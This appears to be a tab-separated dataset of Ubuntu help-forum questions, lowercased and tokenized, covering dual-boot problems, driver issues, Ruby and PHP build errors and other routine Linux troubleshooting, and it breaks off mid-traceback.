381069	ubuntu dual boot pc unable to boot	platform : amd athlon64 3200+ running windows xp . with your help i managed to download ubuntu to a memory stick and run it from that . i liked it and decided to install it alongside xp , so started installation . installation completed and asked to reboot . machine failed to shut down , so after ten mins or so i shut it down manually and brought it back up again . it came up with a black screen and the fan in high speed . tried rebooting with ubuntu memory stick inserted but same thing . tried rebooting with windows recovery disc but same thing . have i lost my pc ?
381070	linux partiton and updating to a new os lubuntu	i have currently installed lubuntu on my old pc . it 's working flawlessly so far , but i have a few questions . i have a 160gb hard disk . according to disk utility , 159 ext4 , 1.1 gb swap and 1.1 gb extended . now i want to install a new os on it . i believe it will be installed on ext 4 and will my personal data be deleted which is on that 159 gb ext 4 partition ? if you think that i should partition it , then how do you suggest i do and from which tool ? gparted takes a long time to load and still does not open . i do n't know why . and for example , i want to boot the .iso image from the usb and install the latest version of the current system ( e.g installing zorin os 7.0 lite over zorin os 6.2 ) how will it affect ? i do n't want to lose my data on the hard disk . what should i do ?
381075	remmina remote desktop rdp connection question	i am a student at penn state and we have remote labs that we can access at anytime as an rdp protocol remote desktop . i am attempting to log in to it using remmina remote desktop viewer , but the instructions are for fedora 's tsclient remote desktop viewer . here is a link to the instructions provided : http : //psbeh8b.psu-erie.bd.psu.edu/remote/statuslinux.htm what i have tried was putting the correct credientals ( my user name , which is all that they ask for ) , putting one of the free computers into the `` server '' text box and in the `` domain '' text box i am putting in the psu.edu line . the viewer hangs and tries to connect but remmina never gets a connection established . update : the school has a tut on how to connect with windows and that works . i downloaded the rdp file to my xubuntu machine . i then imported the file into remmina . that did n't seem to work either . their domain for the windows remote desktop does psu-erie/mylogin and the linux suggests that i use psu.erie and put my user name in the name text box of the rdp gui what can i try to get this to work or which other viewers will make this possible ?
381078	installation and configuration of java 3d in ubuntu	my java 3d project using netbeans is running fine in my windows environment . but when i run project in ubuntu 12.04 it shows this exception : java.lang.unsatisfiedlinkerror : no j3d in java.library.path this is because i do n't know how to install and configure java 3d in ubuntu . i tried sudo apt-get install libjava3d-java
381080	problem running in jekyll . installation	i have installed ruby , rubygems and then jekyll , but when i run jekyll i 'm getting this error . $ jekyll serve /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:365 : in `require_program ' : program version required ( commander : :runner : :commanderror ) from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:364 : in `each' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:364 : in `require_program' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:52 : in `run ! ' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/delegates.rb:7 : in `run ! ' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/import.rb:10 from /usr/local/bin/jekyll:19 /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require ' : no such file to load -- json ( loaderror ) from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/../lib/jekyll/filters.rb:2 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/../lib/jekyll.rb:43 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/jekyll:7 from /usr/local/bin/jekyll:19 : in `load' from /usr/local/bin/jekyll:19 somasundaram @ somasundaram-inspiron-3521 : ~/allfiles/msomu/msomu.github.io $ ^c somasundaram @ somasundaram-inspiron-3521 : ~/allfiles/msomu/msomu.github.io $ jekyll/var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:365 : in `require_program ' : program version required ( commander : :runner : :commanderror ) from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:364 : in `each' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:364 : in `require_program' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/runner.rb:52 : in `run ! ' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/delegates.rb:7 : in `run ! ' from /var/lib/gems/1.8/gems/commander-4.1.5/lib/commander/import.rb:10 from /usr/local/bin/jekyll:19 /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require ' : no such file to load -- json ( loaderror ) from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/../lib/jekyll/filters.rb:2 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/../lib/jekyll.rb:43 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /var/lib/gems/1.8/gems/jekyll-1.3.0/bin/jekyll:7 from /usr/local/bin/jekyll:19 : in `load' from /usr/local/bin/jekyll:19 also if there is no way to fix it please help me if someone tells me how to completely remove ruby , rubygems jekyll and fresh install it or fix this error .
381082	ubuntu 13.10 and qualcomm gobi 2000 in hp ( gobi_loader )	i try to run my 3g modem . it 's in ( not usb ) my laptop . i install gobi_loader , put files in /lib/firmware/gobi ( 3 files ) and after restart laptop , modem do n't start : / i try use : /lib/udev/gobi_loader -2000 /dev/ttyusb0 /lib/firmware/gobi after put this i have : failed to open serial device : : no such file or directory usage : /lib/udev/gobi_loader [ -2000 ] serial_device firmware_dir anyone can help me ? i have ubuntu 13.10 : /
381086	how do i stop ubuntu from suggesting to upgrade to a non-lts release ?	i am on ubuntu 12.04 64bit . as of recently i started getting message that i need to upgrade the system in order to install new kernel . look at the image . however , during this upgrade they will remove some of tools which i do not want to be removed . the same thing happened a few months ago and i upgraded to install kernel and as of then some java apps stopped working , especially those who were depended on 32bit libraries i forcibly installed . how to stop this happening ? why are they forcing me to upgrade when 12.04 was supposed to be lts ?
381090	picasa 3.9 and ubuntu	i still cant get this to work . picasa 3.0 and ie6 installed ok but when i try to logon to google i just get a blank screen . any ideas ?
381091	why sh and ./ providing diffent output for the same script	$ sh emp1.sh enter the pattern to be searched : $ ./emp1.sh enter the pattern to be searched : \c contents of emp1.sh script $ cat emp1.sh # ! /bin/bash # emp1.sh : interactive version uses read to take input echo `` enter the pattern to be searched : \c '' read pname echo `` enter the file to be used : \c '' read flname echo `` searching for the pattern $ pname from the file $ flname '' grep `` $ pname '' $ flname echo `` selected records are shown above '' provide me why their is difference in first line why \c is their in second line . $ sh emp1.sh enter the pattern to be searched : $ ./emp1.sh enter the pattern to be searched : \c
381092	why is scp failing with permission denied ?	i would like to upload my website files to my server . i use : scp localpath username @ ipaddress : server_path is it correct ? after enter the password , it shows permission denied . why ?
381097	ubuntu 13.10 installer ca n't see 2nd ssd	i am on an acer aspire s5-391 , and it previously ran windows 7 with 2 ssd 's on a raid0 configuration . long story short , i messed up the mbr on windows , which corrupted it , and i had to reinstall it . for me to do that , i needed to switch my raid to ahci , and i have now reinstalled windows 7 on my 1st ssd ( /dev/sda ) . now i am trying to run dual boot windows/ubuntu and i am running on a live-usb of v13.10 trying to install it . problem is : when i try to install ubuntu , it wo n't let me access my 2nd ssd ( /dev/sdb ) and only gives me options to install alongside windows ( only on /dev/sda ) . i have tried reformatting sdb into ext4 , and made it an active partition through diskpart in windows , however it still wo n't show on the installation screen . as of right now , it seems like i ca n't even touch my 2nd hard drive . this is what comes up on sudo fdisk -l : disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00071ff6 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 250066943 124930048 7 hpfs/ntfs/exfat disk /dev/sdb : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xadcc7bda device boot start end blocks id system /dev/sdb1 * 2048 250066943 125032448 83 linux p.s . i think it says linux on sdb1 because i tried to go the wubi route , which kinda worked but i still pretty much could n't access my 2nd disk . any help would be appreciated , i am completely stuck : (
381098	ubuntu 12.04 server edition consumes 300mb ram in full install , but ubuntu virtual box image consumes only 100mb	ubuntu 12.04 server edition installed in my laptop consumes 300mb ram even without any gui installed . i also have ubuntu in virtual box image , it consumes only 100mb ram . how to reduce the memory footprint of ubuntu in my laptop . please let me know may be some services that i can switch off from startup etc..which can bring down ram . thanks , harish pathangay
381099	how to log into lxc container ?	i recently installed the 32 bit lxc container on a 64 bit ubuntu 12.04 system . when i run the command sudo lxc-start -n my32bitbox i am greeted with a login prompt . i enter the default login and password which is : login= ubuntu ; password= ubuntu ; but i am still unable to log on to the container . how can i resolve this issue ?
381101	wireless local network not being detected	i ve been a casual ubunutu user for a couple of years now . i recently decided to remove windows vista from my gateway mt 6840 laptop and installed ubuntu 13.04 . i had a dual boot before - vista and 12.04 . even before the upgrade , i had a problem with the wifi . my home wifi network was just not being detected . it shows up at odd times and just dissappears . previously in dual boot mode i used to boot into windows when the network was not detected . however over time even windows stop detecting the network . now the problem persists even with the new 13.10 installation . while all nearby wifi networks are being detected , i dont know why only my wifi network is not being detected . now i am forced to drag my laptop and place it next to the modem to connect by lan to the internet . i understand that some basic logs will be required for anyone to diagnose the issue . as i am not too aware bout the commands would appreciate a walkthrough for generating the logs . i am guessing that the issue should be with my network card ... smartlink.. any help will be deeply appreciated . regards , jacob
381102	how to install ubuntu 12.04 in a system with windows vista ?	i burned the iso image of the ubuntu desktop version 12.04 to a dvd . i tried boot the system from the optical drive system , after placing the ubuntu dvd inside . but the systems does n't seem to read the dvd . please help .
381107	graphics driver quality problem	how can i find a graphics drivers for my dell latitude laptop ? the driver that is installed with ubuntu 12.04 does not support some applications like google earth .
381108	safely remove using command line	i have a external seagate 1tb usb hard disk . every time i connect it to my computer it gets automatically mounted . while removing it i select safely remove option rather than unmount because i read somewhere that it is recommended . i have two questions : - is true that just unmounting can damage my hard disk . should i always select safely remove option ? ( i know the difference between unmount and safely remove and i have also noted that unmounting removes it from file table entry but safely removing actually stops using it . the power supply led goes off after safely removing which does n't happen with unmount ) . the first question leads me to this ! how do i `safely remove my hard disk from command line ? ( i know how to umount it.. but even if i unmount it it is still shown in fdiks -l i do n't want that )
381110	trying to install ubuntu on computer via cd ; no bootable device	i 'm trying to install ubuntu on my desktop computer , a dell inspiron 530 , intel core 2 duo . i burned the dvd on my friends computer , it verified correctly , but when i try to boot from cd/dvd drive , it reads as follows : begin -- -- -- -- -- -- -begin boot from cd : no boot device available , press enter key to retry sata-0 : installed sata-1 : installed sata-4 : none sata-5 : none end -- -- -- -- -- -- -- -- end pressing enter key yeilds no results , i am stuck , and would like instruction as for how to proceed ? if at all possible ?
381111	gsl ruby gem on ubuntu saucy ( 13.10 )	i 'm trying to install the gsl gem on ubuntu saucy i installed the relevant gsl packages with sudo apt-get install gsl-bin libgsl0-dev but then installing the gem fails in file included from /usr/include/ruby-1.9.1/ruby.h:32:0 , from ../include/rb_gsl_array.h:34 , from wavelet.c:13 : wavelet.c : in function ‘rb_gsl_wavelet_define_const’ : wavelet.c:155:45 : error : ‘forward’ undeclared ( first use in this function ) rb_define_const ( klass , `` forward '' , int2fix ( forward ) ) ; ^ /usr/include/ruby-1.9.1/ruby/ruby.h:225:45 : note : in definition of macro ‘int2fix’ # define int2fix ( i ) ( ( value ) ( ( ( signed_value ) ( i ) ) < < 1 | fixnum_flag ) ) ^ wavelet.c:155:45 : note : each undeclared identifier is reported only once for each function it appears in rb_define_const ( klass , `` forward '' , int2fix ( forward ) ) ; ^ /usr/include/ruby-1.9.1/ruby/ruby.h:225:45 : note : in definition of macro ‘int2fix’ # define int2fix ( i ) ( ( value ) ( ( ( signed_value ) ( i ) ) < < 1 | fixnum_flag ) ) ^ wavelet.c:157:46 : error : ‘backward’ undeclared ( first use in this function ) rb_define_const ( klass , `` backward '' , int2fix ( backward ) ) ; ^ /usr/include/ruby-1.9.1/ruby/ruby.h:225:45 : note : in definition of macro ‘int2fix’ # define int2fix ( i ) ( ( value ) ( ( ( signed_value ) ( i ) ) < < 1 | fixnum_flag ) ) ^ wavelet.c : in function ‘rb_gsl_wavelet_transform0’ : wavelet.c:194:31 : error : ‘forward’ undeclared ( first use in this function ) gsl_wavelet_direction dir = forward ; ^ wavelet.c : in function ‘rb_gsl_wavelet2d’ : wavelet.c:534:31 : error : ‘forward’ undeclared ( first use in this function ) gsl_wavelet_direction dir = forward ; ^ make : *** [ wavelet.o ] error 1 the problem is similar to this one : problems installing gsl gem the top solution from that thread does n't work though - the source package for gsl 1.14 is not available at that address anymore . i guess this will be useful to many users with saucy .
381112	static ip network guide	i have a fresh install of 13.10 and my networking works fine ( cable model cloud router ) via the standard network manager applet . i 'm trying to setup my box to a use static ip instead of dhcp and i 'm trying to use your guide : https : //help.ubuntu.com/13.10/serverguide/network-configuration.html # ip-addressing basically , the settings via the networking applet seem to be conflicting with what i see on the command line . a ) the ifconfig -a shows eth0 with the inet address assigned via dhcp . ifconfig -a eth0 link encap : ethernet hwaddr 44:87 : fc:97 : ed:24 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4687 : fcff : fe97 : ed24/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:61170 errors:0 dropped:0 overruns:0 frame:0 tx packets:41321 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:79517729 ( 79.5 mb ) tx bytes:4735861 ( 4.7 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 ... .. ... .. b ) however , the interfaces file does not have even eth0 defined . cat /etc/network/interfaces auto lo iface lo inet loopback c ) i could not even do : sudo ifdown eth0 ifdown : interface eth0 not configured how is this possible or what am i basically missing ? will the steps in the link above for configuring a static ip work ? thanks , dinshaw
381113	install php 5.3 in ubuntu 13.10 ?	my problem is i have scripts online that work in php 5.3 not more recent versions . i wish to develop web sites locally instead of uploading partial changes . after much reading , i made the following script to do it as i was reading . i also made a video which i link to at the bottom of this post . # ! /bin/bash mkdir /opt/phpfcgi-5.3.24 mkdir /usr/local/src/php5-build cd /usr/local/src/php5-build wget http : //de.php.net/get/php-5.3.24.tar.bz2/from/this/mirror -o php-5.3.24.tar.bz2 tar jxf php-5.3.24.tar.bz2 cd php-5.3.24/ apt-get install build-essential apt-get build-dep php5 apt-get install libfcgi-dev libfcgi0ldbl libjpeg62-dbg libmcrypt-dev libssl-dev libc-client2007e libc-client2007e-dev ./configure \ -- prefix=/opt/phpfcgi-5.3.24 \ -- with-pdo-pgsql \ -- with-zlib-dir \ -- with-freetype-dir \ -- enable-mbstring \ -- with-libxml-dir=/usr \ -- enable-soap \ -- enable-calendar \ -- with-curl \ -- with-mcrypt \ -- with-zlib \ -- with-gd \ -- with-pgsql \ -- disable-rpath \ -- enable-inline-optimization \ -- with-bz2 \ -- with-zlib \ -- enable-sockets \ -- enable-sysvsem \ -- enable-sysvshm \ -- enable-pcntl \ -- enable-mbregex \ -- with-mhash \ -- enable-zip \ -- with-pcre-regex \ -- with-mysql \ -- with-pdo-mysql \ -- with-mysqli \ -- with-jpeg-dir=/usr \ -- with-png-dir=/usr \ -- enable-gd-native-ttf \ -- with-openssl \ -- with-fpm-user=www-data \ -- with-fpm-group=www-data \ -- with-libdir=/lib/x86_64-linux-gnu \ -- enable-ftp \ -- with-kerberos \ -- with-gettext \ -- enable-cgi make make install cp /usr/local/src/php5-build/php-5.3.24/php.ini-production /opt/phpfcgi-5.3.24/lib/php.ini apt-get -y install php-pear cd /opt/phpfcgi-5.3.24/etc pecl -c ./pear.conf update-channels pecl -c ./pear.conf install apc pecl -c ./pear.conf install memcache pecl -c ./pear.conf install memcached cd /tmp wget http : //downloads2.ioncube.com/loader_downloads/ioncube_loaders_lin_x86.tar.gz tar xfvz ioncube_loaders_lin_x86.tar.gz cp ioncube/ioncube_loader_lin_5.3.so /opt/phpfcgi-5.3.24/lib/php/extensions/no-debug-non-zts-20090626/ioncube.so echo `` [ ... ] '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` extension=apc.so '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.enabled=1 '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.shm_size=128m '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.ttl=0 '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.user_ttl=600 '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.gc_ttl=600 '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.enable_cli=1 '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` apc.mmap_file_mask=/tmp/apc.xxxxxx '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` extension=memcache.so '' > > /opt/phpfcgi-5.3.24/lib/php.ini echo `` extension=memcached.so '' > > /opt/phpfcgi-5.3.24/lib/php.ini sed -i.bak `` 1i zend_extension \= \/opt\/phpfcgi-5.3.24\/lib\/php\/extensions\/no-debug-non-zts-20090626\/ioncube.so '' /opt/phpfcgi-5.3.24/lib/php.ini kate /opt/phpfcgi-5.3.24/lib/php.ini mkdir /var/www/cgi-bin echo `` # ! /bin/sh '' > /var/www/cgi-bin/php5324.fcgi echo `` php_fcgi_children=3 '' > > /var/www/cgi-bin/php5324.fcgi echo `` export php_fcgi_children '' > > /var/www/cgi-bin/php5324.fcgi echo `` php_fcgi_max_requests=5000 '' > > /var/www/cgi-bin/php5324.fcgi echo `` export php_fcgi_max_requests '' > > /var/www/cgi-bin/php5324.fcgi echo `` # which php-cgi binary to execute '' > > /var/www/cgi-bin/php5324.fcgi echo `` exec /opt/phpfcgi-5.3.24/bin/php-cgi '' > > /var/www/cgi-bin/php5324.fcgi chmod +x /var/www/cgi-bin/php5324.fcgi echo `` < virtualhost *:80 > '' > /etc/apache2/sites-available/dev.conf echo `` servername dev.dev '' > > /etc/apache2/sites-available/dev.conf echo `` documentroot /var/www '' > > /etc/apache2/sites-available/dev.conf echo `` < directory \ '' /var/www\ '' > '' > > /etc/apache2/sites-available/dev.conf echo `` options indexes followsymlinks multiviews '' > > /etc/apache2/sites-available/dev.conf echo `` allowoverride all '' > > /etc/apache2/sites-available/dev.conf echo `` order allow , deny '' > > /etc/apache2/sites-available/dev.conf echo `` allow from all '' > > /etc/apache2/sites-available/dev.conf echo `` addhandler php-cgi .php '' > > /etc/apache2/sites-available/dev.conf echo `` action php-cgi /var/www/cgi-bin/php5324.fcgi '' > > /etc/apache2/sites-available/dev.conf echo `` < filesmatch \ '' \.php $ \ '' > '' > > /etc/apache2/sites-available/dev.conf echo `` sethandler php-cgi '' > > /etc/apache2/sites-available/dev.conf echo `` < /filesmatch > '' > > /etc/apache2/sites-available/dev.conf echo `` < /directory > '' > > /etc/apache2/sites-available/dev.conf echo `` < /virtualhost > '' > > /etc/apache2/sites-available/dev.conf a2ensite dev sed -i.bak `` 1i 127.0.0.1 dev.dev '' /etc/hosts service apache2 reload http : //larrykeenan.com/php53.html thanking you in advance . larry keenan
381119	bootloader issue on dual-boot	first of all i would like to mention that , i 'm completely aware of the duplication rule of this forum and this post has been made only after due research on the topic . problem i dual-booted a pre-installed windows 8 laptop with ubuntu 13.10 but now when i power on the system , windows boot manager boots into windows ( without asking which os i would like to boot into ) , one probable reason for the same can be that , windows may have not detected the presence of ubuntu as the secondary os . ( i 've checked the msconfig utility which only lists windows 8.1 ) this is what i have tried i 've tried boot repair utility which i found mentioned at many places in the ubuntu forums as well , but this reported an error ( i can mention the error if anyone needs it ) . i 've also turned off `` secure boot '' and `` fast boot '' in windows . weird behaviour the thing i do n't understand is , when i power off the system by long pressing the power button and then start it again , grub bootloader magically appears ! but , when i shutdown the system from within ubuntu or windows , then windows boot manager boots up directly into windows ... another weird thing here is , when i plug-in the linux live usb and then turn on the system , and keep pressing the f11 key i can load the grub bootloader . but this only happens when the linux live usb key is plugged into a port ... what i ultimately want to achieve so , at the first priority , i would like to have windows boot manager load up at the startup dispalying a list of available os to boot . and if that 's not possible , then grub should load up with the same options i.e . an os list to choose from ...
381120	charms and juju . why there are no charms under saucy ?	i 've just deployed maas and juju in my saucy installation . and i found there are no charms for saucy . i think i need to include cs : precise for all charms . why ? saucy is now released .
381123	changing c drive permissions from ubuntu to windows ?	i can not access the c drive or launch apps that requires admin permission on my windows 8 , because i 've changed c drive admin or user permission to full deny . i 've tried many methods but it did n't work . can i do it from ubuntu ?
381124	ca n't log into user account on 13.04	after entering sudo startx my screen went black and froze . i shut down and tried rebooting and when i go to log in the screen goes black for a couple seconds , then brings the log in menu back up . not sure how to fix this error by any means . any and all help appreciated . edit : installed gdm and can now login via it on my account . however , still wondering if there is a way to fix lightdm login edit 2 : went back in under lightdm . same problem of looping login continued . ctrl+alt+f2 to login then went sudo chown user : user .xauthority seems to of fixed it . no login problems now .
381128	error in pol_shortcutbinair did you install it on the standard location	i am already trying 2 days long installing microsoft word using playonlinux . but i get this error , and i have the latest play onlinux version and i already reinstalled ubunty and even tried it on another os called elemantery luna os based on ubuntu 12.04 but still the same errors i really need word desperate for school i am almost on the edge too install windows 8 please rescue my soul
381132	how to install draftsight ?	but when installing software libgl1-mesa-glx so that draftsight works , but ubuntu keeps telling me that package dependencies can not be resolvedand the following details are shown , libgl1-mesa-glx : depends : libglapi-mesa ( = 9.0-0ubuntu1 ) but 9.0-0ubuntu1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed do i have to install other software for draftsight to work if so what and how ? any help would be greatly appreciated .
381133	how to monitor website requests from my home network ?	i have set up a wireless wifi network through my pc , so that my younger brother can use internet through his laptop . but i want to monitor which sites he is visiting . how can i do that ?
381134	linux drivers for acer aspire 5000	i have an acer aspire 5000 laptop and want to change from xp to linux . do i need to backup my drivers before doing so ?
381137	win8 partitions showing up i ubuntu	i recently installed ubuntu 13.10 alongside win8 . the different win8 partitions ( the main partition , recovery partition and a couple of others ) are showing up in ubuntu . now i 'm wondering if they 're supposed to be showing up in ubuntu in the first place ? if i try to enter ( mount ? ) either of these partitions the following , or similar , message applies : error mounting /dev/sda4 at /media/jonas/acer : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/jonas/acer '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . anything i should worry about ?
381141	mir vs wayland in 13.10 , which one is going to work best for my needs ?	i have 13.10 gnome right now , but i can switch to unity or any other flavor at the login screen . this complicates things . i want to upgrade from xorg to something that supports multitouch so that i can use two mice independently of one another . this will make it easier to interact with 3d objects . if i choose mir , will i be stuck with unity . if i choose wayland , will i be stuck with gnome ?
381143	bt dongle - asus usb-bt400 not working	i run on one problem . my usb bluetooth dongle asus usb-bt400 is not working . i 'm googling whole day for some clues , but without success . could you please help me ? usb deviace is properly found : lsusb : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 008 : id 0b05:17cb asustek computer , inc . bus 001 device 007 : id 17ef:4816 lenovo but when i try to hciconfig , i do n't get any output . i tried it with some old bt dongle , and that worked ... but i need to use especially this one because of bt4.0 support . according to this : http : //lists.freebsd.org/pipermail/freebsd-bugs/2013-september/053719.html it uses bcm20702a chipset , which should work under linux , but maybe it 's not properly recognized with this device ? ( same issue , which is described in the linked site ) i will appreciate any help .
381145	what was the difference between `sudo apt-get -f install` and `sudo apt-get install -f` ?	what was the difference between sudo apt-get -f install and sudo apt-get install -f commands ? i had seen these two commands large number of times , is there any differences in functionality of these two commands ?
381146	installed nvidia 331 , error in steam	i 've installed correctly the nvidia 331 drivers in my ubuntu 64bit , but when i open a game in steam i see this error : could not find required opengl entry point 'glcolormaskindexedext ' nvidia 331 any solutions ?
381148	how to type in two languages in ubuntu 13.10 ?	how can i type in arabic and english languages in ubuntu 13.10 and switch easily like windows ? ( using shift+alt )
381152	how to check if ppa is already added to apt sources list in a bash script	do someone know how to check if a ppa is already added to my system before i add it with the add-apt-repository command in a shell script . that would be very helpful . thank you .
381154	youtube does n't work !	the title say it all . youtube does n't work , no not the flash player does n't work , the webpage wo n't load . also everything works , kind of ( see the end of the post ) , perfect in chromium the error is `` youtube the app is currently unreachable . '' in mozilla `` server not found firefox ca n't find the server at www.youtube.com . check the address for typing errors such as ww.example.com instead of www.example.com if you are unable to load any pages , check your computer 's network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . '' also i get alot of broken images ( on facebook , google images )
381158	nvidia geforce gtx650	i have read this post but there is no feedback . i 've also googled it ( maybe with the wrong keywords ? ) but i could n't find a recent list of supported graphic cards . i 'm building my desktop and i would like to ask anyone who knows or who has this graphic card : does it work or not ? if it does , any special instructions to get it working ( as i could n't find any official support for this card ) ? i 've had a bad history of graphic card support with ati , i 'd like to get it right this time . thanks in advance !
381160	raid driver ubuntu 13.10	i have ubuntu 13.10 installed on an old computer with a msi 7032 k8t neo-v motherboard which has a build-in raid 0/1 controller . i tried connecting two other hdd 's in raid 0 ( from a home server ) to it , but they do n't show up . i recon i need to install a supplementary driver for the raid chipset , but i have no idea how , all i find are windows drivers . does someone know how i can get ubuntu to read these disks ?
381162	initramfs disk does not exist	i 've installed ubuntu 13.10 . after reboot i got this error message : alert ! /dev/disk/by-uuid/ee1ab1c1-21a2-4935-a5d6-61e18d9dbf0a does not exist . dropping to a shell ! if i type blkid into initramfs prompt , nothing prints out . i have no idea what 's wrong , can somebody help me ? i have two disks in my laptop . on first disk , which is ssd , i installed ubuntu . on second disk , which is hdd , i have windows 7 . there are no problems with booting into windows .
381165	deleting unbuntu os from flash drive	i have install ubuntu from a flash drive and after installation i want to delete it from my flash drive . but now the flash drive is only showing me 2mb space however it is a 4gb flash drive formatting also did n't solve the problem do n't it many times . so how do i get my space back again ?
381174	how do work unity keyboard shortcuts	i want to have custom shortcuts , but although i gave trails with keyboard options in settings center , i ca n't reach my goal . i only reached to get super+l for lock work ok. strangely , super+d to reach the desktop works fine for me , although the definition is ctrl+super+d=hide standard windows in settings . i want super+c for calculator , but i ca n't prevent it to launch the search window to show the pictures in my pc . i also want super+t to launch a terminal ( and super+shift+t for sudo terminal ) instead of trash ( strangely again , i ca n't find any trash or super+t in the default settings ) . please help me , i ca n't understand the mysteries here inside .
381175	can i install ubuntu even if windows is broken ?	my laptop 's windows 7 installation is broken , so i ca n't boot windows on it . i was thinking of installing ubuntu to replace windows , but i do n't know how to do this . i am going to try installing ubuntu 12.04.3 . can i do this with a 800 mb disc ? finally , is it possible if windows is installed , but does n't work ?
381176	videos playing in web brower , play at double speed , how do i stop this ?	i have recently been having a problem with my web browsers ( firefox and chromium ) playing all videos ( youtube and ect ... ) i have uninstalled flash and then re-installed it and done the same to my web browsers , but none of these have seemed to have worked any thought oor ideas to help will be greatly appreciated .
381179	problem setting up minecraft coder pack and forge	recently i learned java and now i would like to create my own mod for minecraft . so i followed this tutorial on setting up mcp and forge : http : //www.youtube.com/watch ? v=klytemiatzw i followed all the instructions but then i stumbled upon a problem trying to install forge , upon running install.sh this was the terminal output : ================ forge modloader setup start =================== mcp detected already , not downloading setting up mcp backing up commands.py patching file commands.py commands patch applied successfully copying fml conf creating re-packaged srg creating re-packaged exc creating re-packaged mcp patches fixing mcp workspace downloaded argo-3.2-src.jar downloaded guava-14.0-rc3.jar downloaded asm-4.1.tar.gz downloaded asm-debug-all-4.1.jar downloaded bcprov-debug-jdk15on-148.jar downloaded bcprov-jdk15on-148-src.zip downloaded guava-14.0-rc3-sources.jar downloaded scala-library.jar file exists : lwjgl.jar file exists : lwjgl_util.jar file exists : jinput.jar downloaded windows_natives.jar extracting jinput-dx8.dll extracting jinput-dx8_64.dll extracting jinput-raw.dll extracting jinput-raw_64.dll extracting lwjgl.dll extracting lwjgl64.dll extracting openal32.dll extracting openal64.dll downloaded macosx_natives.jar extracting libjinput-osx.jnilib extracting liblwjgl.jnilib extracting libopenal.dylib extracting openal.dylib downloaded linux_natives.jar file exists : minecraft.jar file exists : minecraft_server.jar == mcp 7.51 ( data : 7.51 , client : 1.5.2 , server : 1.5.2 ) == '' scalac '' is not found on the path . scala files will not be recompiled fatal error traceback ( most recent call last ) : file `` /home/michel/documenten/loaderextenders/runtime/decompile.py '' , line 50 , in decompile commands = commands ( conffile , verify=true , no_patch=no_patch ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 202 , in 